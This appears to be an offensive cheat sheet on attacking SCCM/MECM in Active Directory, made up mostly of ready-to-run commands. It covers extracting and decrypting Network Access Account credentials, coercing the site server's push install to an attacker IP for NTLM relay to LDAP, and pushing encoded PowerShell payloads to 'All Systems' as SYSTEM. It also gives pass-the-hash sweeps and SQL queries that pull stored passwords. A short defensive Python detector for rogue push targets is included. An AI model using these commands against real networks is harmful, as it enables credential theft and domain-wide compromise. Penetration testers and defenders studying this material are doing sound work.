AD Attacks

SCCM / MECM Attacks

SCCM (System Center Configuration Manager / MECM) attack surface in AD: hierarchy discovery, NAA credential extraction via WMI, client push NTLM relay, SCCM admin to domain-wide RCE, site database MSSQL access, SharpSCCM and SCCMHunter tooling.

SCCM manages Windows deployments across the entire domain. Compromise the SCCM infrastructure and you get SYSTEM-level code execution on every managed workstation. The main attack paths: extract NAA credentials from a managed client, relay client push authentication, or become an SCCM admin and deploy malicious packages.

Discovery

# AD — find SCCM servers by SPN or hostname
Get-DomainComputer | Where { $_.dnshostname -match "sccm|mecm|configmgr|cm" }
Get-DomainComputer -SPN "SMS*" | select dnshostname, serviceprincipalname

# AD System Management container (where site server registers itself)
Get-DomainObject -SearchBase "CN=System Management,CN=System,DC=corp,DC=local"

# From a managed client
SharpSCCM.exe local sms-provider
SharpSCCM.exe local site-info
# Network sweep
nmap -p 80,443,8005 10.10.10.0/24 --open
nxc smb 10.10.10.0/24 | grep -i "sccm\|mecm\|configmgr"
# SCCMHunter — automated discovery
python3 sccmhunter.py find -u user -p pass -d corp.local -dc DC_IP

Network Access Account (NAA) Credential Extraction

SCCM uses a Network Access Account (NAA) to download content from distribution points. The NAA’s encrypted credentials are stored on every managed client in WMI — readable by local admins.

# SharpSCCM — extract NAA from WMI
SharpSCCM.exe local naa

# Manual WMI query
Get-WmiObject -Namespace root\ccm\policy\Machine\RequestedConfig -Class CCM_NetworkAccessAccount

# CIM version
Get-CimInstance -Namespace root\ccm\policy\Machine\RequestedConfig -ClassName CCM_NetworkAccessAccount

Output is base64/hex-encoded. Decrypt via DPAPI:

# DPAPI decrypt (on the same machine, as SYSTEM or the service account)
Add-Type -AssemblyName System.Security   # ProtectedData lives here in Windows PowerShell 5.1
$encrypted = 'hex_encoded_credential'
# [Convert]::FromHexString only exists on .NET 5+ (PowerShell 7); this loop also works on 5.1
$bytes = [byte[]](0..($encrypted.Length/2 - 1) | ForEach-Object { [Convert]::ToByte($encrypted.Substring($_*2, 2), 16) })
$decrypted = [System.Security.Cryptography.ProtectedData]::Unprotect($bytes, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
[System.Text.Encoding]::UTF8.GetString($decrypted)
# SharpSCCM (also pulls push install account)
SharpSCCM.exe get naa
SharpSCCM.exe get accounts

Client Push Install → NTLM Relay

When SCCM pushes the agent to a new client, the site server authenticates to the target over SMB. Trigger a push to your attacker IP → capture and relay the site server’s NTLM authentication.

# Terminal 1: ntlmrelayx targeting LDAP (for DCSync or computer account)
ntlmrelayx.py -t ldap://DC_IP --add-computer EVILPC 'EvilPass123!'   # --add-computer takes NAME PASSWORD positionally

# Terminal 2: trigger push install targeting attacker IP
SharpSCCM.exe invoke client-push \
  -sms SCCM_SERVER \
  -sc SITE_CODE \
  -t ATTACKER_IP

# The site server connects back to ATTACKER_IP:445 → ntlmrelayx relays the push account's NTLM authentication

After relay: use the computer account for RBCD attack or grant yourself DCSync rights.
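A defender-side check for the push-trigger abuse above, added here and not part of SharpSCCM or any SCCM tooling: it scans CCM.log-style lines from the site server (the sample lines are constructed, modelled on the client push log format) and flags push attempts whose target is a raw IP literal or a name that is absent from the site's device inventory, which is exactly what a push redirected to an attacker host looks like.

```python
import re
from ipaddress import ip_address

# Constructed sample lines modelled on the site server's CCM.log (client push log);
# not copied from a real environment. WKS01 is a legitimate push, the other two are not.
SAMPLE_CCM_LOG = r"""
======>Begin Processing request: "2097152010", machine name: "WKS01"
---> Attempting to connect to administrative share '\\WKS01\admin$' using account 'CORP\sccm_push'
======>Begin Processing request: "2097152011", machine name: "10.10.10.99"
---> Attempting to connect to administrative share '\\10.10.10.99\admin$' using account 'CORP\sccm_push'
======>Begin Processing request: "2097152012", machine name: "FILESRV02"
---> Attempting to connect to administrative share '\\FILESRV02\admin$' using account 'CORP\sccm_push'
"""

# Devices the site actually discovered (in practice exported from the console or v_R_System).
INVENTORY = {"WKS01", "WKS02", "WKS03"}

REQ_RE = re.compile(r'Begin Processing request: "(\d+)", machine name: "([^"]+)"')
SHARE_RE = re.compile(r"administrative share '\\\\([^\\]+)\\admin\$' using account '([^']+)'")


def is_ip_literal(name):
    # True if the push target is a bare IPv4/IPv6 address rather than a device name.
    try:
        ip_address(name)
        return True
    except ValueError:
        return False


def find_suspicious_pushes(log_text, inventory):
    """Return one finding per push attempt whose target is not a known, inventoried device."""
    findings = []
    request_id = None
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if m:
            request_id = m.group(1)   # the next share line belongs to this push request
            continue
        m = SHARE_RE.search(line)
        if not m:
            continue
        target, account = m.group(1), m.group(2)
        reasons = []
        if is_ip_literal(target):
            reasons.append("target is a raw IP address, not a discovered device")
        if target.upper() not in inventory:
            reasons.append("target is absent from the site inventory")
        if reasons:
            findings.append({"request": request_id, "target": target,
                             "account": account, "reasons": reasons})
    return findings
```

Feed it the real CCM.log and the site's device list; every finding is a push the site server made to a host it never discovered, which warrants checking the push account's sessions on the DC and the relay targets in that window.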


SCCM Admin → Mass Domain RCE

If you obtain SCCM administrator credentials (or relayed session), deploy a malicious application/package to all managed hosts.

# SharpSCCM — execute command on all managed hosts
SharpSCCM.exe exec \
  -sms SCCM_SERVER \
  -sc SITE_CODE \
  -p "cmd.exe /c whoami > C:\Temp\pwned.txt" \
  -d "All Systems"

# PowerShell payload
SharpSCCM.exe exec \
  -sms SCCM_SERVER \
  -sc SITE_CODE \
  -p "powershell -enc BASE64_PAYLOAD"

# Target specific collection
SharpSCCM.exe exec -sms SCCM_SERVER -sc SITE_CODE -p "cmd /c ..." -t "All Workstations"

This executes as SYSTEM on every machine in the collection — domain-wide RCE.


Site Server → Local Admin on Clients

The SCCM site server machine account has local admin on all managed clients (installed during push). Once you have the site server machine account hash:

# PTH to all managed clients (the machine account is a domain account, so authenticate against the domain, not --local-auth)
nxc smb 10.10.10.0/24 -u 'SCCMSERVER$' -H MACHINE_ACCOUNT_HASH -d corp.local
nxc smb 10.10.10.0/24 -u 'SCCMSERVER$' -H MACHINE_ACCOUNT_HASH -d corp.local --sam

SCCM Database (MSSQL)

The SCCM site database stores inventory, client data, credentials, and package configs. It’s a standard MSSQL instance:

# Connect to SCCM DB
mssqlclient.py -windows-auth corp.local/admin:pass@SCCM_SQL_SERVER

# Query managed computers
SQL> SELECT Name, LastLogon00, IPAddress0 FROM CM_SC1.dbo.v_R_System;

# Query NAA credentials stored in DB
SQL> SELECT UserName, Password FROM CM_SC1.dbo.vSMS_SC_SiteDefinition_Property WHERE PropertyName LIKE 'NAA%';

# Find site codes
SQL> SELECT SiteCode, SiteName FROM CM_SC1.dbo.v_SiteSystemSummarizer;

SCCMHunter — Full Attack Workflow

# Discovery
python3 sccmhunter.py find -u user -p pass -d corp.local -dc DC_IP

# Check permissions
python3 sccmhunter.py check admin -u user -p pass -d corp.local

# Extract NAA credentials via HTTP
python3 sccmhunter.py http -u user -p pass -d corp.local -t SCCM_SERVER

# Enumerate collections
python3 sccmhunter.py admin -u admin -p pass -d corp.local -t SCCM_SERVER --get-collections

SharpSCCM — Quick Reference

# Enumerate
SharpSCCM.exe local sms-provider        # find local MP
SharpSCCM.exe local site-info           # site code, version
SharpSCCM.exe get sites                 # all sites
SharpSCCM.exe get collections           # target collections
SharpSCCM.exe get naa                   # NAA creds
SharpSCCM.exe get accounts              # all stored accounts

# Attack
SharpSCCM.exe local naa                 # WMI NAA extraction
SharpSCCM.exe exec -sms SERVER -sc CODE -p "cmd" -d "All Systems"  # mass RCE
SharpSCCM.exe invoke admin-service ...  # trigger push install for relay

Attack Decision Flow

SCCM present in environment?
├── You have local admin on any managed client?
│   └── YES → SharpSCCM local naa → domain credentials
├── You have low-priv domain creds?
│   └── Check MAQ → create computer → trigger push → NTLM relay
├── You have SCCM admin?
│   └── exec → all systems → SYSTEM everywhere
└── You have DC/DA already?
    └── Extract NAA from any client via WMI or SCCM DB